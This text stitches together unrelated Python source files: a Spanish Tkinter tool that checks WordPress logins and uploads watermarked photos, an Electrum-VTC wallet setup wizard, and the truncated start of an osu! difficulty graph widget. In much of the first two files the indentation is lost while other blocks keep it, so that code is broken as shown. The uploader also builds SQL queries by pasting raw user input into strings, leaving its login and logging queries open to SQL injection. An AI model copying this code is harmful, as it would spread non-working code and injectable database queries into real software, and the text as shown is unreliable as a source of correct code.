LOG_IN_TITLE = "Ingreso de Usuario"
NO_FOLDER_SELECTED = "No se ha seleccionado una carpeta"
FILES_SELECTED = " imagenes seleccionadas!"
NO_FILES_SELECTED = "La carpeta no contiene imagenes validas"
PLEASE_SELECT_FOLDER = "Por favor seleccione una carpeta"
USERNAME = "Nombre de usuario: "
PASSWORD = "Contraseña: "
SUCCESSFUL_LOGIN = "Conexion exitosa"
UNSUCCESSFUL_LOGIN = "Conexion fallida"
S_LOGIN_DESC = "Puede proceder a utilizar el programa"
U_LOGIN_DESC = "Credenciales no validas. Vuelva a intentarlo"
USER_NOT_FOUND = "Usuario no encontrado en la base de datos"
USER = "Usuario:"
ADMIN = "Administrador"
COL = "Colaborador"
INV = "Invitado"
PREVIEW = "Foto de ejemplo"
CONNECTION_ERROR = "Error de conexion con internet"
SET_NAME = "Escriba el nombre de la actividad"
UPLOAD = "Subir fotos"
NO_NAME = "Necesita establecer un nombre de archivo"
RANK_NOT_ENOUGH = "Usted no tiene el rango necesario para subir fotos."
BASE_STATE = "Trabajando..."
UPLOADING = "Subiendo: "
PROCESSING = "Procesando: "
FINISHED = "Finalizado!"
MENU_SETTINGS = "Opciones"
MENU_OPTION_QUIT = "Salir"
SHUTDOWN_FINISH = "Apagar la computadora al finalizar"
WILL_SHUTDOWN = "La computadora se apagara automaticamente despues de subir las fotos.\nPresione Aceptar para continuar, o Cancelar para volver. "
WARNING = "Advertencia"
CREDITS_INFO = SOFTWARE_NAME + "\n" + SOFTWARE_DESCRIPTION + "- Version: " + VERSION + "\nDesarrollado y diseñado por: Luis Jose Lopez Miranda\nUltima revision: " + LAST_REV
CREDITS = "Creditos"
WISH_TO_QUIT = "¿Realmente desea salir?"
PROCESS_ONGOING = "Las fotos se están subiendo. Si cierra el programa, el proceso se interrumpirá.\nPresione Aceptar para salir o Cancelar para continuar"
# Associative fetching / By: Ian Howson
def FetchOneAssoc(cursor) :
data = cursor.fetchone()
    if data is None:
        return None
    desc = cursor.description
    row = {}
    for (name, value) in zip(desc, data):
        row[name[0]] = value
    return row
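# Hypothetical usage sketch (the query mirrors one used further below):
#     cur = conn.cursor()
#     cur.execute("SELECT height FROM settings")
#     row = FetchOneAssoc(cur)   # -> {'height': ...} or None if the query returned no rows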
logged = False
dirname = ""
valid_dir = False
images = []
user = ""
real_name = ""
rank = ""
act_name = ""
can_upload = False
password_sec = ""
step = 0
# Create a window
root = tk.Tk()
root.title(SOFTWARE_NAME + " || Version: " + VERSION)
root.resizable(width=False, height=False)
root.configure(background=S_BG)
root.option_add('*tearOff', tk.FALSE)
root.wm_iconbitmap(ICON_URL)
def askIfQuit():
if (step > 3):
if messagebox.askokcancel(WISH_TO_QUIT, PROCESS_ONGOING):
root.destroy()
sys.exit()
else:
root.destroy()
sys.exit()
def handler():
t2=threading.Thread(target=askIfQuit)
t2.start()
root.protocol("WM_DELETE_WINDOW", handler)
def showCredits():
messagebox.showinfo(CREDITS, CREDITS_INFO, parent=root)
# Create the menubar
menubar = tk.Menu(root)
root['menu'] = menubar
menu_settings = tk.Menu(menubar)
menubar.add_cascade(menu=menu_settings, label=MENU_SETTINGS)
menubar.add_command(label=CREDITS, command=showCredits)
# Set the variable for shutdown
shutdown_on_finish = tk.BooleanVar()
menu_settings.add_checkbutton(label=SHUTDOWN_FINISH, variable=shutdown_on_finish, onvalue=True, offvalue=False)
shutdown_on_finish.set(False)
menu_settings.add_command(label=MENU_OPTION_QUIT, command=handler)
# Set additional elements on the main window
title = tk.Frame(root, bg=MAIN_BG, width=MAX_W)
header_img = tk.PhotoImage(file=MAIN_IMAGE)
header_label = tk.Label(title, bg = MAIN_BG, image = header_img).pack()
title.pack()
progress = tk.Frame(root, bg=I_BG, width=MAX_W)
#Test DB Connection
try:
conn = pymysql.connect(host=MYSQL_HOST, user=MYSQL_USER, passwd=MYSQL_PASS, db=MYSQL_DB)
wp_conn = pymysql.connect(host=WP_MYSQL_HOST, user=WP_MYSQL_USER, passwd=WP_MYSQL_PASS, db=WP_MYSQL_DB)
except:
messagebox.showinfo(MY_SQL_ERROR, MAKE_SURE_INTERNET, icon="warning", parent = root)
root.quit()
sys.exit()
login_w = tk.Toplevel(root, takefocus = True)
login_w.wm_iconbitmap(ICON_URL)
instruct = tk.Frame(root, width=MAX_W, bg = S_BG, padx=10)
preview = tk.Frame(root, width=MAX_W, bg = S_BG)
folder_label = tk.Label(instruct, fg = S_TEXT, text = NO_FOLDER_SELECTED, bg = S_BG)
images_layout = tk.Frame(root, width=MAX_W, bg = S_BG)
images_label = tk.Label(instruct, fg = S_TEXT, text = PLEASE_SELECT_FOLDER, bg = S_BG)
preview_canvas = tk.Canvas ( preview, width=MAX_W/2, height=MAX_H/2.5, bg = I_BG )
m_name = tk.StringVar()
def first_step():
global step
step = 1
login_w.title(LOG_IN_TITLE)
textologin = tk.Label(login_w, text=LOG_IN_PLEASE).pack()
user_label = tk.Label(login_w, text=USERNAME).pack()
username = tk.StringVar()
name = tk.Entry(login_w, textvariable=username)
name.pack()
pass_label = tk.Label(login_w, text=PASSWORD).pack()
password = tk.StringVar()
pswd = tk.Entry(login_w, textvariable=password, show = '*')
pswd.pack()
name.focus_set()
login_w.transient(root)
login_w.grab_set()
login_w.geometry('400x120')
login = tk.Button(login_w, text="Login", command=lambda: verifyUser(username.get(), password.get()))
login.pack()
root.wait_window(login_w)
def secondStep():
global step
step = 2
user_label = tk.Label(title, bg = MAIN_BG, fg = MAIN_TEXT, text=USER + " " + real_name + ", " + rank).pack()
if (can_upload):
label_instruct1 = tk.Label(instruct, text=FIRST_STEP, bg = S_BG, fg=I_TEXT).pack()
folder_label.pack()
select_folder.pack()
instruct.pack()
else:
tk.Label(title, bg = I_BG, fg = S_TEXT, text=RANK_NOT_ENOUGH).pack()
def startProcess():
t1=threading.Thread(target=processImages)
t1.start()
upload_button = tk.Button(preview, text=UPLOAD, command=startProcess, bg = S_BG, fg = S_TEXT)
def thirdStep():
global step, conn
m_img = Image.open(join(dirname+"/", random.choice(images)))
if (step < 3):
tk.Label(preview, text=SET_NAME, fg=I_TEXT, bg=S_BG).pack()
name_entry = tk.Entry(preview, textvariable=m_name, bg=MAIN_BG, width=50)
name_entry.pack()
preview_img = applyWatermark(m_img, getWatermark())
preview_img.thumbnail((MAX_W/2, MAX_H/2), Image.ANTIALIAS)
preview_label = tk.Label(preview, bg = S_BG, fg = I_TEXT, text=PREVIEW).pack()
photo = ImageTk.PhotoImage(preview_img)
pr_img = tk.Label(preview, image=photo)
pr_img.image = photo
preview_canvas.create_image(MAX_W/4,MAX_H/5, image = photo)
preview_canvas.pack()
upload_button.pack()
preview.pack()
else:
preview_img = applyWatermark(m_img, getWatermark())
preview_img.thumbnail((MAX_W/2, MAX_H/2), Image.ANTIALIAS)
preview_label = tk.Label(preview, bg = S_BG, fg = I_TEXT, text=PREVIEW).update()
photo = ImageTk.PhotoImage(preview_img)
pr_img = tk.Label(preview, image=photo)
pr_img.image = photo
preview_canvas.delete("all")
preview_canvas.create_image(MAX_W/4,MAX_H/5, image = photo)
preview_canvas.update()
step = 3
def getHeightStd():
cur = conn.cursor()
if (cur.execute("SELECT height FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["height"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def getWidthStd():
cur = conn.cursor()
if (cur.execute("SELECT width FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["width"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def getWatermarkURL():
cur = conn.cursor()
if (cur.execute("SELECT watermark FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["watermark"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def verifyUser(u, p):
    global user, real_name, rank, password_sec, wp_conn, logged
#if (wp_conn):
cur = wp_conn.cursor()
if (cur.execute("SELECT * FROM wp_users WHERE user_login = '"+u+"'")):
r = FetchOneAssoc(cur)
cur.close()
if (phpass.verify(p,(r["user_pass"]))):
password_sec = p
login_w.destroy()
logged = True
user = u
real_name = r["display_name"]
rank = getRank(r["ID"])
secondStep()
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, U_LOGIN_DESC, icon="warning", parent=root)
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, MAKE_SURE_INTERNET, icon="warning", parent=root)
#else:
#wp_conn = pymysql.connect(host=WP_MYSQL_HOST, user=WP_MYSQL_USER, passwd=WP_MYSQL_PASS, db=WP_MYSQL_DB)
#verifyUser(u, p)
# List all current images
def list_images(folder):
    pictures = [f for f in listdir(folder) if isfile(join(folder, f)) and f.lower().endswith((".jpg", ".png"))]
return pictures
def updateFolderLabel(content):
global folder_label
folder_label.config(text=content)
def selectFolder():
global dirname
global folder_label
global images
dirname = filedialog.askdirectory(mustexist = True)
if (dirname != ""):
updateFolderLabel(dirname)
images = list_images(dirname)
if (isValidDir()):
thirdStep()
select_folder = tk.Button(instruct, text=SELECT_FOLDER, command=selectFolder, bg = S_BG, fg = S_TEXT)
# Apply watermark, by hasanatkazmi - modified by Luis Jose Lopez Miranda
def applyWatermark(im, mark):
if im.mode != 'RGBA':
im = im.convert('RGBA')
layer = Image.new('RGBA', im.size, (0,0,0,0))
position = (im.size[0]-mark.size[0], im.size[1]-mark.size[1])
layer.paste(mark, position)
watermarked = Image.composite(layer, im, layer)
return watermarked
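# The watermark is pasted onto a transparent layer the size of the photo (bottom-right corner)
# and composited back using the layer's own alpha, so transparency in the mark is preserved.
# Hypothetical usage sketch (file names are examples only):
#     marked = applyWatermark(Image.open("photo.jpg"), Image.open("mark.png"))
#     marked.thumbnail((MAX_W, MAX_H), Image.ANTIALIAS)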
def getExt(file):
if(file.endswith(".jpg") or file.endswith(".JPG")):
return ".jpg"
else:
return ".png"
def isValidDir():
amount_of_images = str(len(images))
images_label.pack()
if (len(images) > 0):
images_label.config(text = amount_of_images + FILES_SELECTED)
return True
else:
images_label.config(text = NO_FILES_SELECTED)
return False
def writeImage(img, name):
if not os.path.exists(TEMP_FOLDER_NAME):
os.makedirs(TEMP_FOLDER_NAME)
img.save( join(TEMP_FOLDER_NAME, name))
def uploadImage(loc, name):
client = Client(WP_URL, user, password_sec)
with open(join(loc,name), "rb") as img:
data = {
'name': name,
'bits': xmlrpc_client.Binary(img.read()),
'type': 'image/jpeg',
}
response = client.call(media.UploadFile(data))
os.remove(join(loc,name))
def processImages():
    global step
    act_name = m_name.get()
    # If the user asked to shut down when finished, confirm before starting the upload
    if shutdown_on_finish.get():
        if not messagebox.askokcancel(title=WARNING, message=WILL_SHUTDOWN, parent=root):
            return
    if (act_name != ""):
        upload_button['state'] = 'disabled'
        select_folder['state'] = 'disabled'
        step = 4
        mark = getWatermark()
        size = getWidthStd(), getHeightStd()
        i = 0
        upload_progress = ttk.Progressbar(progress, orient='horizontal', mode='indeterminate')
        upload_progress.pack(expand=True, fill=tk.BOTH, side=tk.TOP)
        v = tk.StringVar()
        current_label = tk.Label(progress, textvariable=v, bg = I_BG)
        current_label.pack()
        v.set(BASE_STATE)
        progress.pack(expand=True, fill=tk.BOTH, side=tk.TOP)
        upload_progress.start(50)
        for file in images:
            full_name = act_name + "_" + str(i) + "_" + time.strftime("%d_%m_%Y") + getExt(file)
            v.set(PROCESSING + " " + full_name)
            m_img = Image.open(join(dirname+"/", file))
            img = applyWatermark(m_img, mark)
            img.thumbnail(size, Image.ANTIALIAS)
            writeImage(img, full_name)
            v.set(UPLOADING + " " + full_name)
            uploadImage(TEMP_FOLDER_NAME, full_name)
            i += 1
        upload_progress.stop()
        upload_progress.destroy()
        v.set(FINISHED)
        end()
    else:
        messagebox.showinfo("Error", NO_NAME, icon="warning", parent=root)
def wpConnect(u,p):
    wp = Client(WP_URL, u, p)
return wp
def getWatermark():
try:
path = io.BytesIO(urllib.request.urlopen(getWatermarkURL()).read())
watermark = Image.open(path)
return watermark
except:
messagebox.showinfo(CONNECTION_ERROR, MAKE_SURE_INTERNET, icon="warning", parent=root)
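# WordPress keeps a legacy numeric capability level per user in wp_usermeta under the
# 'wp_user_level' meta key: here 10 maps to an administrator, anything above 1 to a
# collaborator, and the rest to guests.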
def getRank(ID):
global can_upload
m_id = str(ID)
cur = wp_conn.cursor()
if (cur.execute("SELECT meta_value FROM wp_usermeta WHERE user_id = '"+m_id+"' AND meta_key = 'wp_user_level'")):
r = FetchOneAssoc(cur)
cur.close()
rank = int(r['meta_value'])
if (rank >= 10):
can_upload = True
return ADMIN
elif (rank > 1):
can_upload = True
return COL
else:
can_upload = False
return INV
else:
print("Error")
def recordData(user, name, amount, rank):
global conn
cur = conn.cursor()
if (cur.execute("INSERT INTO `logs` (user ,name ,amount ,rank ) VALUES ( '"+user+"', '"+name+"', '"+amount+"', '"+rank+"' );")):
cur.close()
print (rank + " " + user + " ha subido "+amount+" fotos con el nombre: "+name+".")
else:
print("Error")
def getAdminEmail():
cur = conn.cursor()
if (cur.execute("SELECT email FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["email"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def reset():
    global dirname, valid_dir, images, act_name, step
    dirname = ""
    valid_dir = False
    images = []
    act_name = ""
    step = 0
preview.pack_forget()
select_folder['state'] = 'normal'
instruct.update()
def end():
global user, rank, m_name, images
os.rmdir(TEMP_FOLDER_NAME)
recordData(user, m_name.get(), str(len(images)), rank)
if (shutdown_on_finish.get()):
os.system("shutdown /s")
else:
reset()
first_step()
root.mainloop()
|
installwizard.py
|
import sys
import os
import traceback
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import electrum_vtc as electrum
from electrum_vtc import Wallet, WalletStorage
from electrum_vtc.util import UserCancelled, InvalidPassword
from electrum_vtc.base_wizard import BaseWizard
from electrum_vtc.i18n import _
from seed_dialog import SeedLayout, KeysLayout
from network_dialog import NetworkChoiceLayout
from util import *
from password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Vertcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
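# The wizard_dialog decorator below turns a dialog method into a wizard step: it relabels the
# Back/Cancel button, maps GoBack and UserCancelled to navigation instead of errors, and
# forwards whatever the dialog returns to the run_next callback as positional arguments.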
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-VTC - ' + _('Install Wizard'))
self.app = app
self.config = config
        # Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.connect(self, QtCore.SIGNAL('accept'), self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addLayout(inner_vbox)
hbox.setStretchFactor(inner_vbox, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-vtc.png')
self.show()
self.raise_()
        self.refresh_gui() # Needed for Qt on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-VTC wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if path:
self.name_e.setText(path)
def on_filename(filename):
filename = unicode(filename)
path = os.path.join(wallet_folder, filename.encode('utf8'))
try:
self.storage = WalletStorage(path)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n.decode('utf8'))
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = unicode(self.pw_e.text())
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e), _('OK'))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e), _('OK'))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.emit(QtCore.SIGNAL('synchronized'), msg)
self.connect(self, QtCore.SIGNAL('synchronized'), self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.emit(QtCore.SIGNAL('accept'))
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = map(lambda x: x[0], choices)
c_titles = map(lambda x: x[1], choices)
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(unicode(text)))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(unicode(line.text()).split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
graph_tap_difficulty.py
|
import numpy as np
import threading
import math
import pyqtgraph
from pyqtgraph.functions import mkPen
from pyqtgraph.Qt import QtGui, QtCore
from osu_analysis import StdScoreData
from app.data_recording.data import RecData
class GraphTapDifficulty(QtGui.QWidget):
__calc_data_event = QtCore.pyqtSignal(object, object, object)
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
# Main graph
self.__graph = pyqtgraph.PlotWidget(title='Tap difficulty graph')
self.__graph.getPlotItem().getAxis('left').enableAutoSIPrefix(False)
self.__graph.getPlotItem().getAxis('bottom').enableAutoSIPrefix(False)
self.__graph.enableAutoRange(axis='x', enable=False)
self.__graph.enableAutoRange(axis='y', enable=False)
self.__graph.setLimits(yMin=-1, yMax=12)
self.__graph.setRange(xRange=[-0.1, 1.1], yRange=[-1, 5])
self.__graph.setLabel('left', 'Tap factor', units='', unitPrefix='')
self.__graph.setLabel('bottom', 'Factors', units='%', unitPrefix='')
self.__graph.addLegend()
self.__diff_plot_miss = pyqtgraph.ErrorBarItem()
self.__graph.addItem(self.__diff_plot_miss)
self.__diff_plot_perf = pyqtgraph.ErrorBarItem()
self.__graph.addItem(self.__diff_plot_perf)
self.__diff_plot_bad = pyqtgraph.ErrorBarItem()
self.__graph.addItem(self.__diff_plot_bad)
# Stats
